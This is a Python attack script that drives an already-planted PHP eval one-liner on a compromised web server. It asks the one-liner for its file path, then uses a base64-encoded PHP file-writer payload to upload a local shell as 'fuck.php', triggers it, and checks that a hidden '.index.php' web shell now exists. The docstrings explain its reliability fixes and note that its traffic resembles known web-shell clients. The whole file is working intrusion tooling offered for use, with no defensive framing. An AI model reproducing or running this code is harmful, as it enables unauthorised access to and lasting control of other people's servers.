
#!/usr/bin/python
#coding=utf-8
import sys,requests,base64
# Ask the planted one-liner for its own absolute path on the target host
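def getpath(url, method, passwd):
    """Ask the already-planted PHP one-liner for its own absolute path.

    Sends ``@eval(base64_decode(...))`` through the request parameter named
    ``passwd`` with ``z0`` set to the base64 of
    ``echo $_SERVER['SCRIPT_FILENAME'];`` so the response body is the
    script's path on the target, e.g. ``D:/phpStudy/WWW/1110/x.php``.

    Args:
        url: full URL of the planted one-liner.
        method: ``"get"`` or ``"post"`` (case-sensitive) -- which superglobal
            the one-liner reads its parameters from.
        passwd: name of the request parameter the one-liner ``eval``s.

    Returns:
        The stripped response body (``requests`` ``content``, i.e. bytes on
        Python 3, str on Python 2), or ``0`` when ``method`` is neither
        ``"get"`` nor ``"post"``.  Callers must test for ``0`` before using
        the value as a path.

    Raises:
        requests.RequestException: connection failure, or no answer within
            the 10 s timeout (the original sent these requests without any
            timeout, so an unresponsive target hung the whole run).
    """
    # base64("echo $_SERVER['SCRIPT_FILENAME'];")
    probe = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
    if method == "get":
        data = {passwd: '@eval(base64_decode($_GET[z0]));', 'z0': probe}
        res = requests.get(url, params=data, timeout=10)
        return res.content.strip()
    if method == "post":
        # 'pass' is a second, hard-coded parameter sent alongside the
        # caller-supplied one.  When passwd is itself 'pass' the eval entry
        # wins, exactly as with the original's two dict assignments.
        data = {
            'pass': 'Sn3rtf4ck',
            passwd: '@eval(base64_decode($_POST[z0]));',
            'z0': probe,
        }
        res = requests.post(url, data=data, timeout=10)
        return res.content.strip()
    # Unknown method: no request is made.
    return 0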
# Load the local file whose bytes will be written onto the target
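def loadfile(filepath):
    """Read the local PHP payload that will be uploaded.

    Args:
        filepath: path of the file whose bytes are sent verbatim.

    Returns:
        The file's raw bytes.  On Python 2 this is the same ``str`` the
        original ``str(file.read())`` produced; on Python 3 it is ``bytes``,
        which is what ``base64.b64encode`` accepts -- ``str()`` of a bytes
        object would have uploaded the literal ``b'...'`` repr instead of
        the file.

    Raises:
        SystemExit: after printing ``File ... Not Found!`` when the file
            cannot be opened or read (the original's fail-fast behaviour).
    """
    try:
        # ``with`` closes the handle even if read() raises; the original
        # never closed it at all.
        with open(filepath, "rb") as fh:
            return fh.read()
    except (IOError, OSError):
        # Only I/O failures mean "not found"; the original bare ``except``
        # also swallowed KeyboardInterrupt here.
        print("File %s Not Found!" % filepath)
        sys.exit()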
# Upload routine: writes the local file next to the existing one-liner, triggers it and checks the result
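# Base64 of the PHP file-writer snippet sent as z0.  The two variants differ
# only in reading $_POST or $_GET.  Decoded, the snippet takes the destination
# path from z1 and the base64 file body from z2, removes every "\r" and "\n"
# from the body, fwrite()s it, and echoes "X@Y1X@Y" on success or "X@Y0X@Y"
# when fwrite() failed.  Consequence for callers: the uploaded file arrives as
# a single line, so shell1.php must not depend on newlines (a "//" comment,
# for example, would swallow everything after it).
# The z0/z1/z2 parameter names and the X@Y delimiters are the shape of traffic
# well-known Chinese web-shell clients produce, so network signatures written
# for those clients will very likely flag this tool as well.
_WRITER_Z0 = {
    "post": 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOyRjPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MiJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49c3Vic3RyKCRjLCRpLDIpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwndycpLCRidWYpPycxJzonMCcpOztlY2hvKCJYQFkiKTtkaWUoKTs=',
    "get": 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsiejIiXSk7JGM9c3RyX3JlcGxhY2UoIlxyIiwiIiwkYyk7JGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXN1YnN0cigkYywkaSwyKTtlY2hvKEBmd3JpdGUoZm9wZW4oJGYsJ3cnKSwkYnVmKT8nMSc6JzAnKTs7ZWNobygiWEBZIik7ZGllKCk7',
}


def _target_parts(url):
    """Split a target URL into ``(scheme, host[:port], path)``.

    Uses the standard URL parser instead of slicing off a fixed 7 or 8
    characters.  The original's ``url.index("http")`` check also succeeded
    for ``https://`` (it contains ``http``), so https targets were cut at
    offset 7 and the host came out as ``"s:"``; the ``url[8:]`` branch was
    unreachable for any URL that mentioned ``http`` at all.
    """
    try:
        from urllib.parse import urlparse  # Python 3
    except ImportError:
        from urlparse import urlparse  # Python 2
    parts = urlparse(url)
    return parts.scheme or "http", parts.netloc, parts.path


def _writer_request(method, passwd, remote_file, shell_content):
    """Build the parameter dict for the file-writer request.

    ``method`` selects the superglobal both the one-liner and the z0 snippet
    read from.  ``remote_file`` and ``shell_content`` are sent base64-encoded
    in z1/z2, which is what the snippet decodes.
    """
    if not isinstance(shell_content, bytes):
        shell_content = shell_content.encode("utf-8")
    if method == "post":
        data = {
            'pass': 'Sn3rtf4ck',  # second, hard-coded parameter, as in getpath()
            passwd: "@eval(base64_decode($_POST['z0']));",
        }
    else:
        data = {passwd: "@eval(base64_decode($_GET['z0']));"}
    data['z0'] = _WRITER_Z0[method]
    data['z1'] = base64.b64encode(remote_file)
    data['z2'] = base64.b64encode(shell_content)
    return data


def upload(url, method, passwd, shell_path="./shell1.php"):
    """Write a local PHP file next to an existing one-liner and check it took.

    Flow (every failing step prints a ``[-]`` line and returns 0):
      1. GET ``url`` to confirm the one-liner still answers 200.
      2. Ask it for its own absolute path via :func:`getpath`.
      3. Send the file-writer payload so the bytes of ``shell_path`` land as
         ``fuck.php`` in the same directory.
      4. GET ``fuck.php`` once (best effort, 3 s timeout), then GET
         ``.index.php`` in that directory and print ``[+]`` only if it
         answers 200.

    Args:
        url: full URL of the planted one-liner, scheme included
            (``http://host:port/dir/x.php``); a port stays part of the host.
        method: ``"get"`` or ``"post"``; anything else prints ``method err!``
            and exits the process before any request is sent.
        passwd: request-parameter name the one-liner ``eval``s.
        shell_path: local file whose bytes are uploaded; defaults to the
            ``./shell1.php`` the original hard-coded.

    Returns:
        0 on any failure, ``None`` after a successful run.

    Raises:
        SystemExit: unknown ``method``, or ``shell_path`` unreadable (raised
            by :func:`loadfile`).
        requests.RequestException: propagated from :func:`getpath` when the
            path probe itself fails.
    """
    if method not in ("get", "post"):
        # Validated up front.  The original reached this branch only after
        # getpath() had returned 0 for the bad method, and crashed on
        # ``0.split("/")`` before the message was ever printed.
        print("method err!")
        sys.exit()

    scheme, host, path = _target_parts(url)

    # Step 1: is the one-liner still there?
    try:
        res = requests.get(url, timeout=10)
    except requests.RequestException:
        print("[-] %s ERR_CONNECTION_TIMED_OUT" % url)
        return 0
    if res.status_code != 200:
        print("[-] %s Page Not Found!" % url)
        return 0

    shell_content = loadfile(shell_path)  # exits the process if unreadable

    # Step 2: absolute path of the one-liner on the target, e.g.
    # D:/phpStudy/WWW/1110/x.php.  Stay in bytes so a non-ASCII path passes
    # through untouched on both Python 2 and 3.
    remote_script = getpath(url, method, passwd)
    if not remote_script:
        # An empty body means the eval never ran (wrong parameter name,
        # filtered request, ...); the original went on to write "/fuck.php".
        print("[-] %s getpath failed!" % url)
        return 0
    if not isinstance(remote_script, bytes):
        remote_script = remote_script.encode("utf-8")
    # rpartition gives "" when there is no "/", matching the original's
    # empty directory in that case, and avoids its "dir//fuck.php".
    remote_file = remote_script.rpartition(b"/")[0] + b"/fuck.php"

    # Step 3: write the file.  For "get" the entire payload -- file body
    # included -- travels in the query string because the z0 snippet reads
    # $_GET, so a large shell1.php can exceed the server's URL length limit.
    data = _writer_request(method, passwd, remote_file, shell_content)
    try:
        if method == "post":
            res = requests.post(url, data=data, timeout=10)
        else:
            res = requests.post(url, params=data, timeout=10)
    except requests.RequestException:
        # Per the original's note: the one-liner answered during step 1 but
        # was removed before the write.  The original fell through here and
        # re-checked the stale status code from step 1, so a failed write
        # still went on to the trigger step.
        print("[-] %s Shell has already been Deleted" % url)
        return 0
    if res.status_code != 200:
        print("[-] %s upload failed!" % host)
        return 0
    # A stricter check is available: the writer snippet echoes "X@Y1X@Y"
    # when fwrite() succeeded and "X@Y0X@Y" when it did not.

    # Step 4: request fuck.php, then look for the .index.php it is expected
    # to create.  Keep the original scheme: the original rebuilt this URL
    # with a hard-coded "http://", so https targets were probed in the clear.
    base_url = "%s://%s%s" % (scheme, host, path.rpartition("/")[0])
    trigger_url = base_url + "/fuck.php"
    try:
        # Best effort, as in the original: the short timeout and swallowed
        # error suggest this request is not expected to return promptly.
        requests.get(trigger_url, timeout=3)
    except requests.RequestException:
        pass
    shell_url = base_url + "/.index.php"
    try:
        res = requests.get(shell_url, timeout=10)
    except requests.RequestException:
        print("[-] %s create shell failed!" % trigger_url)
        return 0
    if res.status_code != 200:
        print("[-] %s create shell failed!" % trigger_url)
        return 0
    print("[+] %s upload sucessed!" % shell_url)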